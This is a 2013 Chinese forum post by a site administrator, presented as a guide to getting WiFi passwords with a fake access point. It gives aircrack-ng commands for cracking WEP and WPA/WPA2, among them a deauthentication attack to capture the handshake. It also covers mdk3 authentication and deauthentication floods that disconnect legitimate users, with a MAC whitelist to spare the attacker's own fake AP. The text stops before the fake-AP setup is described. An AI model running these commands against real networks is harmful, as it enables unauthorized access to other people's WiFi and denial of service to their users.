灯火互联
管理员
管理员
  • 注册日期2011-07-27
  • 发帖数41778
  • QQ
  • 火币41290枚
  • 粉丝1086
  • 关注100
  • 终身成就奖
  • 最爱沙发
  • 忠实会员
  • 灌水天才奖
  • 贴图大师奖
  • 原创先锋奖
  • 特殊贡献奖
  • 宣传大使奖
  • 优秀斑竹奖
  • 社区明星
阅读:4751回复:0

怎样利用伪造的AP拿到WiFi密码

楼主#
更多 发布于:2013-01-18 08:55

 00×01 介绍

  不管使用什么系统,一定要把网卡激活成为monitor模式,这样软件才可以识别

  iwconfig //查看网卡

  ifconfig start wlan0 //启动wlan0网卡

  airmon-ng start wlan0 //将网卡激活成monitor模式,一般为mon0

  WEP

  airodump-ng --ivs –w log –c频道wlan0 //wep用ivs过滤报文即可,速度快

  aireplay-ng -3 –b bssid –h clientMac mon0 //采用ARPRequesr来迅速加大数据

  aircrack-ng ivs文件 //破解捕获来的ivs文件 wep用这几个命令足以了

  WPA/WPA2

  airodump-ng –c频道–w log mon0 //wpa正常抓包即可

  aireplay-ng -0 3 –a BSSID –c clientMAC wlan0 //发动Deauth攻击获取完整的handshake提示获取成功,即可破解抓来的数据包

  aircrack-ng –w字典文件捕获的cap文件 //WPA破解完全靠字典,需要有耐心

  其实说到这里,hash破解速录会大大提升,只是利用字典制作hashtable的时候需要花好长的时间,但是破解是aircrack的几十倍.

  常见的几种DOS攻击:

  Authentication Flood、Deauthentication Flood、Disassociation Flood、RFJamming、Association Flood等

  00×02 利用工具

  本次我们还是依赖于BT5下一款强大的工具,mdk3

  现在大部分无线下的工具都是利用mdk3为基本内核来开发的,所以其性能就不用多说了.

  针对路由器,我们可以发动Authentication Flood,mdk3下参数为a,此攻击是针对无线AP的洪水攻击,

  又叫做身份验证攻击.其原理就是向AP发动大量的虚假的链接请求,这种请求数量一旦超过了无线AP所能承受的范围,

  AP就会自动断开现有链接,使合法用户无法使用无线网络

  mdk3 mon0 a –a AP的MAC地址(BSSID)

  可以看到发动的同时,有大量虚假的客户端对AP进行连接,这些client

  MAC地址也都是随机伪造的

  a

  此时我们可以通过-c来对指定的频道进行攻击,-a固定bssid进行攻击,-s控制发包速率.一般默认的是200个包/秒,

  这样我们持续的攻击下去,无线网络在几分钟之内就会瘫痪,但是问题是,如果我们遇到一个能承载大量用户的AP客户端,那么我们该怎么办呢?

  别急,下面我们就来使用当初我们获得handshake时候使用过的Deauthentication Flood,

  记得么,当初我们使用aireplay-ng-0来发动使其断线来获取握手包,其实aireplay-ng即可发动,只要不控制发包数量,并随机频道即可,但是相比mdk3效率并不高.

  这种攻击不是针对AP的,而是针对于client MAC.

  mdk3 mon0 d

  攻击开始了

  可以看到,我的网络瞬间断断续续,当我停止后,网络恢复

  此时我们可以利用-s参数来加快发包速率.这种效率是非常高的,一般发动开始,client便开始断网.

  另外我们可以使用-w(白名单) –b(黑名单)来添加我们的mac地址,这样我们就可以使自己伪造的AP永远的不受自己的攻击所影响,

  而黑白名单可以写单独的一个mac也可以写文件的绝对路径,然后把要加入名单的mac写在文件里.

  伪造AP

  首先我们需要一块支持AP的无线网卡,或者直接上无线路由器,或者做热点,做ap方法网上很多很多,

  这个大家可以自己找下.

喜欢0 评分0
游客

返回顶部